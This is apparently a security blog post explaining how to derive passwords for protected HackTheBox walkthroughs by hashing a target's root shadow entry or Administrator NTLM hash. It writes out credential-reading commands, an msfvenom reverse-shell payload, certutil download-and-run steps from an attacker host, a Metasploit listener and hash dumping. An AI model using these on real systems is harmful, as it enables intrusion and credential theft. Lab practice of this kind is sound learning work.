Walkthrough Decryption Instructions
After migrating from WordPress to Hugo, I do not have the ability to password protect blog posts. All content will be public and because of that these decryption instructions are no longer worthwhile for https://hackerunder.dev. I will not be posting content that requires password protection. For example, I previously shared unretired hackthebox machine walkthroughs but required hashes as the password for the post.
This decryption method was copied from 0xPrashant and his own blog. The page may not always be online, so I have copied the walkthrough decryption instructions from an archived backup. Below is a summary of how to create hashes from unique strings in a target machine with either Linux or Windows operating systems.
Linux Machine Instructions (Using the root user hash in /etc/shadow)
When you own root on a machine you can read the content of /etc/shadow file
cat /etc/shadow and read the contents of the shadow file
cat /etc/shadow root:$6$YIFGN9pFPOS3EmwO$qwICXAw4bqSjjjFaCT1qYscCV72BjFtx/tehbc7sQTJp09UJj9u83eBio1cLcaxyGkx2oDhJsXT6LL0FABlc5.:18277:0:99999:7:::
Create a md5hash from the /etc/shadow entry
Copy whole the line for the root user
The following command converts this text to a md5 hash
echo root:$6$YIFGN9pFPOS3EmwO$qwICXAw4bqSjjjFaCT1qYscCV72BjFtx/tehbc7sQTJp09UJj9u83eBio1cLcaxyGkx2oDhJsXT6LL0FABlc5.:18277:0:99999:7::: | md5sum
And you get 02bece38cf6510fb40f19e7caa16e323
This is the password for protected posts of linux machines
Windows Machine Instructions (Using the Administrator NTLM hash)
When you own a windows machine you are allowed to get the NTLM hashes of all the users
To get the NTLM hash, use a meterpreter shell and the
hashdump command or an alternative
Assuming you already have access to an Administrator or System level shell
Create a payload that opens a meterpreter shell with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<YOURIP> lport=4444 -f exe > msf.exe
Host the payload and download it to the target Windows machine
python3 -m http.server 80
certutil -urlcache -split -f http://<YOURIP>/msf.exe c:/windows/temp/msf.exe
Launch a meterpreter listener
kali: msfconsole msf5> use exploit/multi/handler msf5> set LHOST <YOURIP> msf5> run
Run the msf.exe file on the victim through your shell
Once a meterpreter session is established, run
If you see the following error
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
List processes with
Migrate to a process running as SYSTEM and try again
WARNING: Hashdump.exe might not give correct NTLM hashes, use another alternative
Download and transfer hashdump.exe to the windows machine and run it with option /samdump
PS C:\tmp> .\hashdump.exe /samdump SAM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::
0xPrashant has a post on getting the NTLM hash from a Windows machine. Besides Meterpreter he also goes over Mimikatz and Secretdump. Any option should work.
Create a md5hash from the NTLM hash
Copy just the NTLM hash, which is the fourth entry between the colons (:)
The following command will convert it to a md5 hash
echo 31d6cfe0d16ae931b73c59d7e0c | md5sum
Here we got a8ca0fb8a398cd4268cd5baf75ec29a3
Paste it in the writeup where it asks for password for decryption of writeup
Please enjoy the password protected posts after attempting to hack the machines yourself. Use public walkthroughs of retired or older machines if you are new or looking to just follow along. It is a waste of talent to brute force the post password just to follow the steps and not hack a machine by your own ability.
Hopefully these walkthrough decryption instructions are clear and you are able to view protected posts. Feel free to reach out to me or wait for the machines to become retired and I will make the walkthroughs public.
Please comment with questions or suggestions or if a machine guide is incorrect.
If a walkthrough is violating a lab’s Terms of Service or needs to be removed, please reach out to me as well at HackerUnderDev on Twitter.